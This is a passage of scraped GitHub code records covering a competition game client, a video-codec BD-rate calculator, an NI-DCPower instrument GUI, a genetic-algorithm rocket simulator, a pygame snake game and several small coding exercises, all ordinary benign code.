effort_remaining)\n act = disaster\n current_lasting_disasters.remove(disaster)\n\n # Allocate effort to upgrading the city\n elif city.level != CityLevel.level_three and ActionType.upgrade_city not in things_done:\n self.print('Upgrading city')\n effort_spent = min(city.effort_remaining, effort_remaining)\n act = ActionType.upgrade_city\n\n # Build police building\n elif city.gold > effort_remaining and \\\n city.buildings[BuildingType.police_station].level != BuildingLevel.level_one and \\\n city.buildings[BuildingType.police_station] not in things_done:\n self.print('Building police building')\n effort_spent = min(city.buildings[BuildingType.police_station].effort_remaining, effort_remaining)\n act = city.buildings[BuildingType.police_station]\n\n # Build billboard building\n elif city.gold > effort_remaining and \\\n city.buildings[BuildingType.billboard].level != BuildingLevel.level_one and \\\n city.buildings[BuildingType.billboard] not in things_done:\n self.print('Building billboard building')\n effort_spent = min(city.buildings[BuildingType.billboard].effort_remaining, effort_remaining)\n act = city.buildings[BuildingType.billboard]\n\n # Upgrade ufo sensor\n 
elif city.sensors[SensorType.ufo].level != SensorLevel.level_two and \\\n city.sensors[SensorType.ufo] not in things_done:\n self.print('Building ufo sensor')\n effort_spent = min(city.sensors[SensorType.ufo].effort_remaining, effort_remaining)\n act = city.sensors[SensorType.ufo]\n\n # Upgrade earthquake sensor\n elif city.sensors[SensorType.earthquake].level != SensorLevel.level_two and \\\n city.sensors[SensorType.earthquake] not in things_done:\n self.print('Building earthquake sensor')\n effort_spent = min(city.sensors[SensorType.earthquake].effort_remaining, effort_remaining)\n act = city.sensors[SensorType.earthquake]\n\n # Upgrade tornado sensor\n elif city.sensors[SensorType.tornado].level != SensorLevel.level_two and \\\n city.sensors[SensorType.tornado] not in things_done:\n self.print('Building tornado sensor')\n effort_spent = min(city.sensors[SensorType.tornado].effort_remaining, effort_remaining)\n act = city.sensors[SensorType.tornado]\n\n # Build printer building\n elif city.gold > effort_remaining and \\\n city.buildings[BuildingType.printer].level != BuildingLevel.level_one and \\\n city.buildings[BuildingType.printer] not in things_done:\n self.print('Building printer building')\n effort_spent = min(city.buildings[BuildingType.printer].effort_remaining, effort_remaining)\n act = city.buildings[BuildingType.printer]\n\n # Get money otherwise\n else:\n self.print('Getting money')\n effort_spent = effort_remaining\n act = ActionType.accumulate_wealth\n\n actions.add_effort(act, effort_spent)\n things_done.append(act)\n total_effort_spent += effort_spent\n","repo_name":"PixPanz/byte_le_royale_2020","sub_path":"test_clients/big_sensor_client.py","file_name":"big_sensor_client.py","file_ext":"py","file_size_in_byte":7181,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"43"} +{"seq_id":"14274851901","text":"__author__ = \"maggie.sun@intel.com, ryan.lei@intel.com\"\n\nimport numpy as np\nimport math\nimport scipy.interpolate\nimport logging\nfrom Config import LoggerName\nfrom operator import itemgetter\nfrom Utils import plot_rd_curve\n\nsubloggername = \"CalcBDRate\"\nloggername = LoggerName + '.' + '%s' % subloggername\nlogger = logging.getLogger(loggername)\n\ndef non_decreasing(L):\n return all(x<=y for x, y in zip(L, L[1:]))\n\ndef check_monotonicity(RDPoints):\n '''\n check if the input list of RD points are monotonic, assuming the input\n has been sorted in the quality value non-decreasing order. expect the bit\n rate should also be in the non-decreasing order\n '''\n br = [RDPoints[i][0] for i in range(len(RDPoints))]\n qty = [RDPoints[i][1] for i in range(len(RDPoints))]\n return non_decreasing(br) and non_decreasing(qty)\n\ndef filter_vmaf_non_monotonic(br_qty_pairs):\n '''\n To solve the problem with VMAF non-monotonicity in a flat (saturated)\n region of the curve, if VMAF non-monotonicity happens at VMAF value\n 99.5 or above, the non-monotonic value and the values corresponding\n to bitrates higher than the non-monotonic value are excluded from the\n BD-rate calculation. 
The VMAF BD-rate number is still reported and\n used in the VMAF metric average.\n '''\n #first sort input RD pairs by bit rate\n out_br_qty_pairs = []\n br_qty_pairs.sort(key = itemgetter(0, 1))\n for i in range(len(br_qty_pairs)):\n if (i != 0 and\n br_qty_pairs[i][0] >= out_br_qty_pairs[-1][0] and\n br_qty_pairs[i][1] < out_br_qty_pairs[-1][1] and\n out_br_qty_pairs[-1][1] >= 99.5):\n break\n else:\n out_br_qty_pairs.append(br_qty_pairs[i])\n return out_br_qty_pairs\n\n# BJONTEGAARD Bjontegaard metric\n# Calculation is adapted from Google implementation\n# PCHIP method - Piecewise Cubic Hermite Interpolating Polynomial interpolation\ndef BD_RATE(qty_type, br1, qtyMtrc1, br2, qtyMtrc2):\n brqtypairs1 = []; brqtypairs2 = []\n for i in range(min(len(qtyMtrc1), len(br1))):\n if (br1[i] != '' and qtyMtrc1[i] != ''):\n brqtypairs1.append((br1[i], qtyMtrc1[i]))\n for i in range(min(len(qtyMtrc2), len(br2))):\n if (br2[i] != '' and qtyMtrc2[i] != ''):\n brqtypairs2.append((br2[i], qtyMtrc2[i]))\n\n if (qty_type == 'VMAF_Y' or qty_type == 'VMAF_Y-NEG'):\n brqtypairs1 = filter_vmaf_non_monotonic(brqtypairs1)\n brqtypairs2 = filter_vmaf_non_monotonic(brqtypairs2)\n\n # sort the pair based on quality metric values in increasing order\n # if quality metric values are the same, then sort the bit rate in increasing order\n brqtypairs1.sort(key = itemgetter(1, 0))\n brqtypairs2.sort(key = itemgetter(1, 0))\n\n rd1_monotonic = check_monotonicity(brqtypairs1)\n rd2_monotonic = check_monotonicity(brqtypairs2)\n if (rd1_monotonic == False or rd2_monotonic == False):\n return \"Non-monotonic Error\"\n\n logbr1 = [math.log(x[0]) for x in brqtypairs1]\n qmetrics1 = [100.0 if x[1] == float('inf') else x[1] for x in brqtypairs1]\n logbr2 = [math.log(x[0]) for x in brqtypairs2]\n qmetrics2 = [100.0 if x[1] == float('inf') else x[1] for x in brqtypairs2]\n\n if not brqtypairs1 or not brqtypairs2:\n logger.info(\"one of input lists is empty!\")\n return 0.0\n\n # remove duplicated quality metric value, the RD point with higher bit rate is removed\n dup_idx = [i for i in range(1, len(qmetrics1)) if qmetrics1[i - 1] == qmetrics1[i]]\n for idx in sorted(dup_idx, reverse=True):\n del qmetrics1[idx]\n del logbr1[idx]\n dup_idx = [i for i in range(1, len(qmetrics2)) if qmetrics2[i - 1] == qmetrics2[i]]\n for idx in sorted(dup_idx, reverse=True):\n del qmetrics2[idx]\n del logbr2[idx]\n\n # find max and min of quality metrics\n min_int = max(min(qmetrics1), min(qmetrics2))\n max_int = min(max(qmetrics1), max(qmetrics2))\n if min_int >= max_int:\n logger.info(\"no overlap from input 2 lists of quality metrics!\")\n return 0.0\n\n # generate samples between max and min of quality metrics\n lin = np.linspace(min_int, max_int, num=100, retstep=True)\n interval = lin[1]\n samples = lin[0]\n\n # interpolation\n v1 = scipy.interpolate.pchip_interpolate(qmetrics1, logbr1, samples)\n v2 = scipy.interpolate.pchip_interpolate(qmetrics2, logbr2, samples)\n\n # Calculate the integral using the trapezoid method on the samples.\n int1 = np.trapz(v1, dx=interval)\n int2 = np.trapz(v2, dx=interval)\n\n # find avg diff\n avg_exp_diff = (int2 - int1) / (max_int - min_int)\n avg_diff = (math.exp(avg_exp_diff) - 1) * 100\n\n return avg_diff\n\n'''\nif __name__ == \"__main__\":\n br1 = [9563.04, 6923.28, 4894.8, 3304.32, 2108.4, 1299.84]\n #qty1 = [50.0198, 46.9709, 43.4791, 39.6659, 35.8063, 32.3055]\n #qty1 = [50.0198, 46.9709, 43.4791, 48.0000, 35.8063, 32.3055]\n qty1 = [99.8198, 99.7709, 98.4791, 99.5000, 98.8063, 98.3055]\n br2 = 
[9758.88, 7111.68, 5073.36, 3446.4, 2178, 1306.56]\n #qty2 = [49.6767, 46.7027, 43.2038, 39.297, 35.2944, 31.5938]\n qty2 = [99.8767, 99.7027, 99.2038, 99.200, 98.2944, 97.5938]\n qty_type = 'VMAF-Y'\n\n plot_rd_curve(br1, qty1, qty_type, 'r', '-', 'o')\n plot_rd_curve(br2, qty2, qty_type, 'b', '-', '*')\n plt.show()\n\n bdrate = BD_RATE('VMAF_Y', br1, qty1, br2, qty2)\n if bdrate != 'Non-monotonic Error':\n print(\"bdrate calculated is %3.3f%%\" % bdrate)\n else:\n print(\"there is Non-monotonic Error in bdrate calculation\")\n'''\n","repo_name":"xiph/awcy","sub_path":"convexhull_framework/src/CalcBDRate.py","file_name":"CalcBDRate.py","file_ext":"py","file_size_in_byte":5555,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"43"} +{"seq_id":"14284334156","text":"import nimodinst\nimport nidcpower\nimport wx\n\n\nclass MyFrame(wx.Frame):\n def __init__(self, *args, **kwds):\n # begin wxGlade: MyFrame.__init__\n kwds[\"style\"] = kwds.get(\"style\", 0) | wx.DEFAULT_FRAME_STYLE\n wx.Frame.__init__(self, *args, **kwds)\n self.SetSize((274, 456))\n self.device_value = wx.ComboBox(self, wx.ID_ANY, choices=[], style=wx.CB_DROPDOWN) # noqa: E501\n # self.channel_value = wx.SpinCtrlDouble(self, wx.ID_ANY, \"0\", min=0.0, max=100.0) # noqa: E501\n self.channel_value = wx.ComboBox(self, wx.ID_ANY, choices=[], style=wx.CB_DROPDOWN) # noqa: E501\n self.output_function_value = wx.ComboBox(self, wx.ID_ANY, choices=[\"DC Voltage\", \"DC Current\"], style=wx.CB_DROPDOWN) # noqa: E501\n self.voltage_value = wx.SpinCtrlDouble(self, wx.ID_ANY, \"\", min=0.0, max=100.0) # noqa: E501\n self.current_value = wx.SpinCtrlDouble(self, wx.ID_ANY, \"\", min=0.0, max=100.0) # noqa: E501\n self.voltage_range_value = wx.SpinCtrlDouble(self, wx.ID_ANY, \"\", min=0.0, max=100.0) # noqa: E501\n self.current_range_value = wx.SpinCtrlDouble(self, wx.ID_ANY, \"\", min=0.0, max=100.0) # noqa: E501\n self.output_enabled_value = wx.ToggleButton(self, wx.ID_ANY, \"\")\n self.voltage_result_value = wx.TextCtrl(self, wx.ID_ANY, \"N/A\")\n self.current_result_value = wx.TextCtrl(self, wx.ID_ANY, \"N/A\")\n self.status = wx.StaticText(self, wx.ID_ANY, \"Good!\")\n self.current_label = wx.StaticText(self, wx.ID_ANY, \"Current Limit\")\n self.voltage_label = wx.StaticText(self, wx.ID_ANY, \"Voltage Level\")\n\n self.__set_properties()\n self.__do_layout()\n # end wxGlade\n\n self.Bind(wx.EVT_CLOSE, self.__window_close_event)\n\n # Changing channel, function or device closes and creates new session\n self.Bind(wx.EVT_COMBOBOX, self.__change_device_event, self.device_value) # noqa: E501\n self.Bind(wx.EVT_COMBOBOX, self.__change_session_event, self.output_function_value) # noqa: E501\n self.Bind(wx.EVT_COMBOBOX, self.__change_session_event, self.channel_value) # noqa: E501\n\n # Changing properties updates reading\n self.Bind(wx.EVT_SPINCTRLDOUBLE, self.__change_attribute_event, self.voltage_value) # noqa: E501\n self.Bind(wx.EVT_SPINCTRLDOUBLE, self.__change_attribute_event, self.current_value) # noqa: E501\n self.Bind(wx.EVT_SPINCTRLDOUBLE, self.__change_attribute_event, self.voltage_range_value) # noqa: E501\n self.Bind(wx.EVT_SPINCTRLDOUBLE, self.__change_attribute_event, self.current_range_value) # noqa: E501\n self.Bind(wx.EVT_TOGGLEBUTTON, self.__change_attribute_event, self.output_enabled_value) # noqa: E501\n\n self._new_device = True\n self._error = False\n self._session = None\n self._modinst_session = None\n self._dev_name = None\n\n # Using NI-ModInst session to list available 
NI-DCPower devices\n self._modinst_session = nimodinst.Session('nidcpower')\n for dev in self._modinst_session.devices:\n dev_name = dev.device_name\n self.device_value.Append('{0}'.format(dev_name))\n self.device_value.SetSelection(0)\n\n # Opening a new session to the selected device\n self.__initialize_new_session()\n\n # Having a timer to regularly take a reading\n self._timer = wx.Timer(self, wx.ID_ANY)\n self.Bind(wx.EVT_TIMER, self.__take_measurement_event, self._timer)\n self._timer.Start(250)\n\n def __set_properties(self):\n # begin wxGlade: MyFrame.__set_properties\n self.SetTitle(\"NI-DCPower Simple SFP\")\n self.device_value.SetMinSize((141, 23))\n self.channel_value.SetMinSize((141, 23))\n self.output_function_value.SetMinSize((141, 23))\n self.output_function_value.SetSelection(0)\n self.output_enabled_value.SetMinSize((141, 26))\n self.voltage_result_value.SetMinSize((141, 23))\n self.current_result_value.SetMinSize((141, 23))\n # end wxGlade\n\n def __do_layout(self):\n # begin wxGlade: MyFrame.__do_layout\n entire_frame_sizer = wx.BoxSizer(wx.VERTICAL)\n status_sizer = wx.StaticBoxSizer(wx.StaticBox(self, wx.ID_ANY, \"Status\"), wx.HORIZONTAL) # noqa: E501\n current_result_sizer = wx.BoxSizer(wx.HORIZONTAL)\n voltage_result_sizer = wx.BoxSizer(wx.HORIZONTAL)\n output_enabled_sizer = wx.BoxSizer(wx.HORIZONTAL)\n current_range_sizer = wx.BoxSizer(wx.HORIZONTAL)\n voltage_range_sizer = wx.BoxSizer(wx.HORIZONTAL)\n current_sizer = wx.BoxSizer(wx.HORIZONTAL)\n voltage_sizer = wx.BoxSizer(wx.HORIZONTAL)\n output_function_sizer = wx.BoxSizer(wx.HORIZONTAL)\n channel_sizer = wx.BoxSizer(wx.HORIZONTAL)\n device_sizer = wx.BoxSizer(wx.HORIZONTAL)\n device_sizer.Add(self.device_value, 0, 0, 0)\n device_label = wx.StaticText(self, wx.ID_ANY, \"Device Name\")\n device_sizer.Add(device_label, 0, 0, 0)\n entire_frame_sizer.Add(device_sizer, 1, wx.EXPAND, 0)\n channel_sizer.Add(self.channel_value, 0, 0, 0)\n channel_label = wx.StaticText(self, wx.ID_ANY, \"Channel\")\n channel_sizer.Add(channel_label, 0, 0, 0)\n entire_frame_sizer.Add(channel_sizer, 1, wx.EXPAND, 0)\n output_function_sizer.Add(self.output_function_value, 0, 0, 0)\n output_function_label = wx.StaticText(self, wx.ID_ANY, \"Output Function\") # noqa: E501\n output_function_sizer.Add(output_function_label, 0, 0, 0)\n entire_frame_sizer.Add(output_function_sizer, 1, wx.EXPAND, 0)\n voltage_sizer.Add(self.voltage_value, 0, 0, 0)\n voltage_sizer.Add(self.voltage_label, 0, 0, 0)\n entire_frame_sizer.Add(voltage_sizer, 1, wx.EXPAND, 0)\n current_sizer.Add(self.current_value, 0, 0, 0)\n current_sizer.Add(self.current_label, 0, 0, 0)\n entire_frame_sizer.Add(current_sizer, 1, wx.EXPAND, 0)\n voltage_range_sizer.Add(self.voltage_range_value, 0, 0, 0)\n voltage_range_label = wx.StaticText(self, wx.ID_ANY, \"Voltage Range\")\n voltage_range_sizer.Add(voltage_range_label, 0, 0, 0)\n entire_frame_sizer.Add(voltage_range_sizer, 1, wx.EXPAND, 0)\n current_range_sizer.Add(self.current_range_value, 0, 0, 0)\n current_range_label = wx.StaticText(self, wx.ID_ANY, \"Current Range\")\n current_range_sizer.Add(current_range_label, 0, 0, 0)\n entire_frame_sizer.Add(current_range_sizer, 1, wx.EXPAND, 0)\n output_enabled_sizer.Add(self.output_enabled_value, 0, 0, 0)\n output_enabled_label = wx.StaticText(self, wx.ID_ANY, \"Output Enabled\")\n output_enabled_sizer.Add(output_enabled_label, 0, 0, 0)\n entire_frame_sizer.Add(output_enabled_sizer, 1, wx.EXPAND, 0)\n static_line_1 = wx.StaticLine(self, wx.ID_ANY)\n entire_frame_sizer.Add(static_line_1, 
0, wx.EXPAND, 0)\n voltage_result_sizer.Add(self.voltage_result_value, 0, 0, 0)\n voltage_result_label = wx.StaticText(self, wx.ID_ANY, \"V\")\n voltage_result_sizer.Add(voltage_result_label, 0, 0, 0)\n entire_frame_sizer.Add(voltage_result_sizer, 1, wx.EXPAND, 0)\n current_result_sizer.Add(self.current_result_value, 0, 0, 0)\n current_result_label = wx.StaticText(self, wx.ID_ANY, \"A\")\n current_result_sizer.Add(current_result_label, 0, 0, 0)\n entire_frame_sizer.Add(current_result_sizer, 1, wx.EXPAND, 0)\n status_sizer.Add(self.status, 0, 0, 0)\n entire_frame_sizer.Add(status_sizer, 25, wx.EXPAND, 0)\n self.SetSizer(entire_frame_sizer)\n self.Layout()\n # end wxGlade\n\n def __initialize_new_session(self):\n # If opening for the first time set output function and channel\n if self._new_device is True:\n # Open simulated session\n self._session = nidcpower.Session(self.device_value.GetStringSelection(), \"\", False, \"Simulate = 1\") # noqa: E501\n channels = self._session.channel_count\n self._session.close()\n self._session = None\n\n # Add total channels on device to combo-box\n self.channel_value.Clear()\n for channel in range(channels):\n self.channel_value.Append(str(channel))\n\n # Set selection to first item in the list\n self.channel_value.SetSelection(0)\n self.output_function_value.SetSelection(0)\n self._new_device = False\n\n # Open session to device and set controls to default values\n try:\n if self._session is not None:\n self._session.close()\n self._session = nidcpower.Session(self.device_value.GetStringSelection(), self.channel_value.GetStringSelection()) # noqa: E501\n self._session.source_mode = nidcpower.SourceMode.SINGLE_POINT\n if self.output_function_value.GetStringSelection() == \"DC Current\":\n self._session.output_function = nidcpower.OutputFunction.DC_CURRENT # noqa: E501\n self.current_label.SetLabel(\"Current Level\")\n self.voltage_label.SetLabel(\"Voltage Limit\")\n self.voltage_value.SetValue(self._session.voltage_limit)\n self.current_value.SetValue(self._session.current_level)\n self.voltage_range_value.SetValue(self._session.voltage_limit_range) # noqa: E501\n self.current_range_value.SetValue(self._session.current_level_range) # noqa: E501\n else:\n self._session.output_function = nidcpower.OutputFunction.DC_VOLTAGE # noqa: E501\n self.current_label.SetLabel(\"Current Limit\")\n self.voltage_label.SetLabel(\"Voltage Level\")\n self.voltage_value.SetValue(self._session.voltage_level)\n self.current_value.SetValue(self._session.current_limit)\n self.voltage_range_value.SetValue(self._session.voltage_level_range) # noqa: E501\n self.current_range_value.SetValue(self._session.current_limit_range) # noqa: E501\n self.output_enabled_value.SetValue(False)\n self._session.output_enabled = False\n self._session.source_delay = 0.1\n self._session._initiate()\n self._error = False\n self.status.SetLabel(\"Good!\")\n\n # Catch error\n except nidcpower.Error as e:\n self._session = None\n self._error = True\n self.status.SetLabel(str(e))\n self.status.Wrap(225)\n\n def __change_session_event(self, event):\n self.__initialize_new_session()\n\n def __change_device_event(self, event):\n self._new_device = True\n self.__initialize_new_session()\n\n def __change_attribute_event(self, event):\n try:\n if self.output_function_value.GetStringSelection() == \"DC Current\":\n self._session.voltage_limit = self.voltage_value.GetValue()\n self._session.current_level = self.current_value.GetValue() # noqa: E501\n self._session.voltage_limit_range = 
self.voltage_range_value.GetValue() # noqa: E501\n self._session.current_level_range = self.current_range_value.GetValue() # noqa: E501\n else:\n self._session.voltage_level = self.voltage_value.GetValue()\n self._session.current_limit = self.current_value.GetValue() # noqa: E501\n self._session.voltage_limit_range = self.voltage_range_value.GetValue() # noqa: E501\n self._session.current_level_range = self.current_range_value.GetValue() # noqa: E501\n self._session.output_enabled = self.output_enabled_value.GetValue() # noqa: E501\n self.status.SetLabel(\"Good!\")\n self._error = False\n\n except nidcpower.Error as e:\n self._error = True\n self.status.SetLabel(str(e))\n self.status.Wrap(225)\n\n def __window_close_event(self, event):\n if self._session is not None:\n self._session.close()\n self.Destroy()\n\n def __take_measurement_event(self, event):\n if self._error is False:\n if self._session is not None:\n try:\n measurements = self._session.measure_multiple()\n self.voltage_result_value.SetLabel(str(measurements[0].voltage)) # noqa: E501\n self.current_result_value.SetLabel(str(measurements[0].current)) # noqa: E501\n\n except nidcpower.Error as e:\n self._error = True\n self.status.SetLabel(str(e))\n self.status.Wrap(225)\n# end of class MyFrame\n\n\nclass MyApp(wx.App):\n def OnInit(self):\n self.frame = MyFrame(None, wx.ID_ANY, \"\")\n self.SetTopWindow(self.frame)\n self.frame.Show()\n return True\n# end of class MyApp\n\n\nif __name__ == \"__main__\":\n app = MyApp(0)\n app.MainLoop()\n","repo_name":"texasaggie97-zz/nimi-sfp","sub_path":"nidcpower_sfp.py","file_name":"nidcpower_sfp.py","file_ext":"py","file_size_in_byte":12947,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"10949056955","text":"scores = input().split()\n# put your python code here\nwrong = 0\ncorrect = 0\nfor score in scores:\n if score == 'C':\n correct += 1\n continue\n if score == 'I':\n wrong += 1\n if wrong == 3:\n print(\"Game over\")\n print(correct)\n break\nelse:\n print(\"You won\")\n print(correct)","repo_name":"merlin2181/Coffee-Machine","sub_path":"Problems/Game over/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"36706234667","text":"\"\"\"usage: \n-h, -help shows this help message\n-s, -simulation out_file1 out_file2 runs algorithm and stores solutions with calculated fitness function in and best solution in \n-v_s, -visualize_solution in_file visualizes single solution instance red from \n-v_c, -visualize_chart in_file visualizes fitness function charts red from \n\"\"\"\nfrom visualization import *\nfrom algorithm import *\nimport simulation\nimport random\nimport threading\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom time import sleep\nimport json\n\nmode = None\ntry:\n for index, arg in enumerate(sys.argv):\n if arg.startswith('-') and mode is not None:\n print(\"cannot use with multiple flags\")\n print(__doc__)\n sys.exit()\n elif arg.startswith('-'):\n if arg == \"-h\":\n print(__doc__)\n sys.exit()\n elif arg == \"-s\":\n mode = [\"-s\", sys.argv[index+1], sys.argv[index+2]]\n elif arg == \"-v_s\":\n mode = [\"-v_s\", sys.argv[index+1]]\n elif arg == \"-v_c\":\n mode = [\"-v_c\", sys.argv[index+1]]\nexcept:\n print(__doc__)\n sys.exit()\nif mode is None:\n print(__doc__)\n sys.exit()\n\n\nif mode[0] == \"-s\":\n algorithm = GeneticAlgorithm()\n print(\"calculating ...\")\n 
populations = algorithm.compute_populations()\n print(\"done calculating.\")\n try:\n with open(mode[1],'w') as file:\n x = [i for i in range(len(populations))]\n y = [sum([s.fitness_function for s in pop]) / len(pop) for pop in populations]\n for i in range(len(populations)):\n file.write(str(x[i]) + ' ' + str(y[i]) + '\\n')\n print(\"population written to \" + str(mode[1]))\n with open(mode[2],'w') as file:\n file.write(json.dumps((populations[-1][-1]).__dict__))\n print(\"best solution written to \" + str(mode[2]))\n except Exception as e:\n print(e)\n print('something went wrong with saving to file ... exiting')\n sys.exit()\nelif mode[0] == \"-v_s\":\n try:\n with open(mode[1]) as file:\n solution_as_dict = json.loads(file.read())\n solution = SolutionInstance(solution_as_dict['launch_time'], solution_as_dict['latitude'], solution_as_dict['launch_speed'])\n algorithm = GeneticAlgorithm()\n time_begin, time_end, planets ,rocket = algorithm.prepare_solution_to_visualize(solution, nr_of_frames = 8000)\n visualization = Visualization(time_begin, time_end, planets ,rocket, 4)\n visualization.show()\n except Exception as e:\n print(\"something went wrong with reading from file \" + str(mode[1]) + \" ... exiting\")\n sys.exit()\nelif mode[0] == \"-v_c\":\n try:\n x = []\n y = []\n with open(mode[1]) as file:\n for line in file:\n xx, yy = line.split(' ')\n x.append(int(xx))\n y.append(float(yy))\n print(\"done reading from file\")\n width = 0.35 # the width of the bars\n fig, ax = plt.subplots()\n ax.set_ylabel('Fitness function')\n rect = ax.bar(x, y, width, color='r')\n for r in rect:\n height = r.get_height()\n ax.text(r.get_x() + r.get_width()/2., 1.05*height,'', ha='center', va='bottom')\n plt.show()\n except:\n print(\"something went wrong with reading from file \" + str(mode[1]) + \" ... exiting\")\n sys.exit()\nelse:\n print(\"can not understand\")\n print(__doc__)\n","repo_name":"mzakrze/genetic-algorithm-solar-system","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"17524632844","text":"class MyHashMap(object):\n\n def __init__(self):\n self.keys = []\n self.values = []\n \n\n def put(self, key, value):\n \"\"\"\n :type key: int\n :type value: int\n :rtype: None\n \"\"\"\n for i in range(len(self.keys)):\n if self.keys[i] == key:\n self.values[i] = value\n return \n\n self.keys.append(key)\n self.values.append(value)\n return\n\n \n\n def get(self, key):\n \"\"\"\n :type key: int\n :rtype: int\n \"\"\"\n for i in range(len(self.keys)):\n if self.keys[i] == key:\n return self.values[i] \n\n return -1 \n\n def remove(self, key):\n \"\"\"\n :type key: int\n :rtype: None\n \"\"\"\n for i in range(len(self.keys)):\n if self.keys[i] == key:\n del self.values[i]\n del self.keys[i]\n break \n\n\n# Your MyHashMap object will be instantiated and called as such:\n# obj = MyHashMap()\n# obj.put(key,value)\n# param_2 = obj.get(key)\n# obj.remove(key)","repo_name":"louiswalsh/leet","sub_path":"0817-design-hashmap/0817-design-hashmap.py","file_name":"0817-design-hashmap.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"38444181796","text":"'''\nQUESTION:\n206. 
Reverse Linked List\n\nReverse a singly linked list.\n\nExample:\n\nInput: 1->2->3->4->5->NULL\nOutput: 5->4->3->2->1->NULL\nFollow up:\n\nA linked list can be reversed either iteratively or recursively. Could you implement both?\n\n'''\n\nclass Solution(object):\n def reverseList(self, head):\n curr = head\n if curr is None:\n return head\n if curr.next is None:\n return head\n p = self.reverseList(curr.next)\n curr.next.next = curr\n curr.next = None\n return p\n\n\n'''\nIdeas/thoughts:\n1.check , if the curr is null then return,\n2.if curr .next is null.that means it is last node and need to become the head and has to be the first node\n3.recursively iterate thru list\n4.set curr . next . next to curr\n5.set curr .next to null \n\n'''","repo_name":"ravichalla/wallbreaker","sub_path":"week4/reverse_linkedlist.py","file_name":"reverse_linkedlist.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"42472968049","text":"import pygame, sys, random, time\n\nfrom pygame.display import update\nfrom pygame.draw import rect\nimport color \nfrom pygame.locals import *\n\n\npygame.init()\nfps = 10\nwin_width = 800\nwin_height = 600\nworm_x = 380\nworm_y = 280 \nspeed_worm_x = 0\nspeed_worm_y = 0\nfood_x = random.randrange(0, 780, 20)\nfood_y = random.randrange(0, 580, 20)\nworm_list = []\nworm_length = 0\nGameOver = False\na = [\"r\", \"l\", \"u\", \"d\"]\nscore = 0\nfont_score = pygame.font.Font(None, 40)\nfont_GameOver = pygame.font.Font(None, 80)\nscr = 0\nbomb_x = random.randrange(0, 780, 20)\nbomb_y = random.randrange(0, 580, 20)\n\n\nwin = pygame.display.set_mode((win_width, win_height))\npygame.display.set_caption(\"Snake\")\nclock = pygame.time.Clock()\n\ndef worm_function(wrm_lst, wrm_x, wrm_y):\n g_over = False\n worm_head = [wrm_x, wrm_y]\n wrm_lst.append(worm_head)\n for lst in wrm_lst:\n pygame.draw.rect(win, color.green, (lst[0], lst[1], 20, 20))\n for each_section in wrm_lst[:-1]:\n if each_section == worm_head:\n g_over = True\n return g_over\n\nwhile not GameOver:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYDOWN:\n if event.key == K_RIGHT and \"l\" in a:\n speed_worm_x = 20\n speed_worm_y = 0\n a.clear()\n a.append(\"l\")\n a.append(\"u\")\n a.append(\"d\")\n if event.key == K_LEFT and \"r\" in a:\n speed_worm_x = -20\n speed_worm_y = 0\n a.clear()\n a.append(\"r\")\n a.append(\"u\")\n a.append(\"d\")\n if event.key == K_DOWN and \"d\" in a:\n speed_worm_y = 20\n speed_worm_x = 0\n a.clear()\n a.append(\"l\")\n a.append(\"r\")\n a.append(\"d\")\n if event.key == K_UP and \"u\" in a:\n speed_worm_y = -20\n speed_worm_x = 0\n a.clear()\n a.append(\"r\")\n a.append(\"l\")\n a.append(\"u\")\n worm_x += speed_worm_x\n worm_y += speed_worm_y\n if worm_x < 0 :\n worm_x = 780\n if worm_x > 780 :\n worm_x = 0\n if worm_y < 0 :\n worm_y = 580\n if worm_y > 580 :\n worm_y = 0\n if worm_x == food_x and worm_y == food_y:\n food_x = random.randrange(0, 780, 20)\n food_y = random.randrange(0, 580, 20)\n worm_length += 1\n if score%6 != 5:\n scr += 1\n score += 1\n else:\n scr += 5\n score += 1 \n if len(worm_list) > worm_length:\n worm_list.pop(0)\n win.fill(color.black)\n if worm_function(worm_list, worm_x, worm_y):\n GameOver = True\n if score%5 != 0 or score==0:\n pygame.draw.rect(win, color.red, (food_x, food_y, 20, 20))\n if score%5 == 0 and score!=0:\n pygame.draw.rect(win, color.blue, (food_x, food_y, 20, 20))\n 
pygame.draw.rect(win, color.green, (worm_x, worm_y, 20, 20))\n t_score = font_score.render(\"Score : \" + str(scr), True, (color.yellow))\n win.blit(t_score, (30, 30))\n pygame.display.update()\n clock.tick(fps)\nt_GameOver = font_GameOver.render(\"Game Over\", True, (color.red))\nwin.blit(t_GameOver, (270, 270))\npygame.display.update()\ntime.sleep(3)\n","repo_name":"llllmatinllll/Python_Libraries","sub_path":"Pygame/Snake/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"22899306787","text":"class Primitive:\n\tdef __init__(self, type, javaType, name, size, equivalent, javaWrapper, accessor, mask):\n\t\tself.type = type\n\t\tself.javaType = javaType\n\t\tself.name = name\n\t\tself.size = size\n\t\tself.equivalent = equivalent\n\t\tself.javaWrapper = javaWrapper\n\t\tself.accessor = accessor\n\t\tself.mask = mask\n\n\tdef __cmp__(self, other):\n\t\treturn 1 - self.__eq__(other) - 2 * self.__lt__(other)\n\n\tdef __lt__(self, other):\n\t\tif isinstance(other, str):\n\t\t\treturn self.name < other\n\t\telse:\n\t\t\treturn self.name < other.name\n\n\tdef __eq__(self, other):\n\t\tif isinstance(other, str):\n\t\t\treturn self.name == other\n\t\telse:\n\t\t\treturn self.name == other.name\n\nPRIMITIVES = {\n\t\"int8_t\":\tPrimitive(\"int8_t\", \t\"int\",\t\t\"Int8\",\t\t1,\t\"byte\",\t\t\"Byte\",\t\t\"\", 